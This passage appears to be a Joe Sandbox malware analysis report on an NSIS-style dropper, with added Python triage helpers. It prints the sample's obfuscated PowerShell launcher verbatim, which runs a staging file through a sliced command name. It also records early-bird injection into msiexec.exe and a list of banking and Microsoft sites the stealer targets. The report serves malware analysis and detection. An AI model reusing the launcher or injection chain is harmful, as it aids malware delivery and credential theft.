Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452 | Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452 | Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452 | Thread sleep time: -599891s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2272 | Thread sleep count: 7998 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2272 | Thread sleep count: 1849 > 30
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6452 | Thread sleep time >= -30000s, 48 further observations in order of occurrence: -599781s, -599672s, -599563s, -599453s, -599344s, -599235s, -599110s, -598985s, -598848s, -598733s, -598625s, -598516s, -598406s, -598297s, -598188s, -598078s, -597969s, -597844s, -597735s, -597610s, -597485s, -597360s, -597235s, -597110s, -596985s, -596860s, -596735s, -596610s, -596485s, -596360s, -596215s, -596108s, -596000s, -595891s, -595766s, -595641s, -595531s, -595422s, -595295s, -595188s, -595078s, -594969s, -594859s, -594750s, -594641s, -594531s, -594422s, -594312s
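The msiexec.exe sleep evidence above (one thread, TID 6452, first sleeping 600000 and then a steadily shrinking value on every iteration) is the footprint of a deadline loop rather than fifty independent sleeps: the thread recomputes "time left until T" from the clock and sleeps again, so each reported delay is the previous one minus the loop's own overhead. The Python below is an added triage helper written by the editor, not code from the Joe Sandbox report or from the sample. The delay series is copied from the report; the 3-minute threshold mirrors the report's "Contains long sleeps (>= 3 min)" signature, the assumption that the values are milliseconds (600000 = 10 min) and the step-uniformity ratio are the editor's, and the reading of 922337203685477 as TimeSpan.MaxValue in whole milliseconds (Int64.MaxValue / 10000) is the editor's interpretation.

```python
"""Triage helper for sandbox 'thread delayed' evidence (added example, not report code)."""
from statistics import mean

# Delay series copied from the report's msiexec.exe (TID 6452) observations, in order.
MSIEXEC_COUNTDOWN_MS = [
    600000, 599891, 599781, 599672, 599563, 599453, 599344, 599235, 599110, 598985,
    598848, 598733, 598625, 598516, 598406, 598297, 598188, 598078, 597969, 597844,
    597735, 597610, 597485, 597360, 597235, 597110, 596985, 596860, 596735, 596610,
    596485, 596360, 596215, 596108, 596000, 595891, 595766, 595641, 595531, 595422,
    595295, 595188, 595078, 594969, 594859, 594750, 594641, 594531, 594422, 594312,
]

# Int64.MaxValue ticks (100 ns each) expressed in whole milliseconds. A .NET sleep
# with TimeSpan.MaxValue reports this value. Assumption (editor's): the report's
# delay values are milliseconds, so 600000 is ten minutes.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000                     # report's ">= 3 min" signature, assumed


def classify_delay(delay_ms):
    """Bucket a single reported delay."""
    if delay_ms >= TIMESPAN_MAX_MS:
        return "effectively-infinite"
    if delay_ms >= LONG_SLEEP_MS:
        return "long"
    return "short"


def analyze_sleep_series(delays_ms, min_len=5, step_spread=10):
    """Summarise a sequence of sleep durations observed on one thread.

    A 'deadline countdown' is a monotonically decreasing series whose steps are
    roughly uniform (max step <= step_spread * min step): the thread keeps sleeping
    for 'deadline - now', so each value is the previous one minus loop overhead.
    """
    steps = [a - b for a, b in zip(delays_ms, delays_ms[1:])]
    monotonic = all(s > 0 for s in steps)
    result = {
        "count": len(delays_ms),
        "monotonic_decreasing": monotonic,
        "total_drop_ms": delays_ms[0] - delays_ms[-1] if delays_ms else 0,
        "min_step_ms": min(steps) if steps else 0,
        "max_step_ms": max(steps) if steps else 0,
        "mean_step_ms": mean(steps) if steps else 0.0,
        "classes": sorted({classify_delay(d) for d in delays_ms}),
    }
    result["deadline_countdown"] = (
        len(delays_ms) >= min_len
        and monotonic
        and result["max_step_ms"] <= step_spread * result["min_step_ms"]
    )
    return result


if __name__ == "__main__":
    print(classify_delay(922337203685477))
    print(analyze_sleep_series(MSIEXEC_COUNTDOWN_MS))
```

On the report's series the helper finds a total drop of 5688 ms over 49 iterations, about 116 ms per pass, i.e. one ten-minute wait re-entered roughly fifty times during the run. That distinction matters when tuning a sandbox: patching a single Sleep call short does not release a loop that re-derives the remaining time from the system clock, whereas accelerating the clock consistently does.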
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00405E6B FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00402647 FindFirstFileA
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: powershell.exe, 00000002.00000002.1255613084.0000000005243000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\/r
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: svchost.exe, 00000004.00000002.2128877775.00000233FD655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2127485584.00000233FC025000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2129804635.000000000628E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2129804635.000000000621A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2129804635.000000000628E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWq'
Source: powershell.exe, 00000002.00000002.1255613084.0000000005243000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\/r
Source: powershell.exe, 00000002.00000002.1255613084.0000000005243000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\/r
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: msiexec.exe, 00000005.00000002.2145064589.0000000022FCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | API call chain: ExitProcess graph end node (graph_0-3784)
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | API call chain: ExitProcess graph end node (graph_0-3782)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00A3D8A4 LdrInitializeThunk
Source: C:\Users\user\Desktop\uPDwUy9ewY.exe | Code function: 0_2_00405E92 GetModuleHandleA,LoadLibraryA,GetProcAddress
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, process created / APC queued / resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, thread APC queued, target process: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, memory written: C:\Windows\SysWOW64\msiexec.exe, base: 4260000
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, code function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (3 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (3 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (3 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll (3 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (10 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat (9 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (8 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll (3 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log (3 times)
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db (2 times)
            Source: C:\Windows\System32\svchost.exe, queries volume information: C:\ (2 times)
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
            Source: C:\Windows\SysWOW64\msiexec.exe, queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exe, code function: 0_2_00405B89 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA
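Two of the entries in this section are worth automating when triaging similar samples: the PowerShell launcher command line (`gc -Raw` on a staging file, a three-character `SubString` at offset 8795 used as the command name, the whole file passed to it via the `.` call operator) and the powershell.exe to msiexec.exe chain that the "Early bird code injection technique detected" signature summarises (process created, memory written at base 4260000, APC queued, then resumed). The following is an added example written for this page, not code from Joe Sandbox or from the sample. The command line is copied from the report; the staging-file content (filler plus `iex` at the sliced offset), the powershell.exe PID 4242 and the API event records are constructed assumptions, since the report shows only msiexec.exe PID 3488 and the written base address.

```python
"""Triage helpers for two behaviours this section records: the PowerShell launcher
command line (gc -Raw ... .SubString(8795,3) ... invoked via '.') and the Early Bird
chain powershell.exe -> msiexec.exe (create suspended, write memory, queue APC, resume).
Added example; not Joe Sandbox or sample code. All event records below are constructed."""
import re
from dataclasses import dataclass

# Matches: $A=gc -Raw '<file>';$B=$A.SubString(<off>,<len>);.$B($A)
LAUNCHER_RE = re.compile(
    r"\$(?P<var>\w+)\s*=\s*gc\s+-Raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=var)\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\$(?P=cmd)\(\$(?P=var)\)",
    re.IGNORECASE,
)

# Command line exactly as the report shows it for powershell.exe
SAMPLE_CMDLINE = (
    r'"powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw '
    r"'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';"
    r'$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)"'
)

def parse_launcher(cmdline):
    """Return (staging_file, offset, length) for a launcher of this shape, else None."""
    m = LAUNCHER_RE.search(cmdline)
    if not m:
        return None
    return m.group("path"), int(m.group("off")), int(m.group("len"))

def resolve_invoked_command(staging_bytes, offset, length):
    """Reproduce what .$B($A) runs: the command *name* is the (offset, length) slice of the
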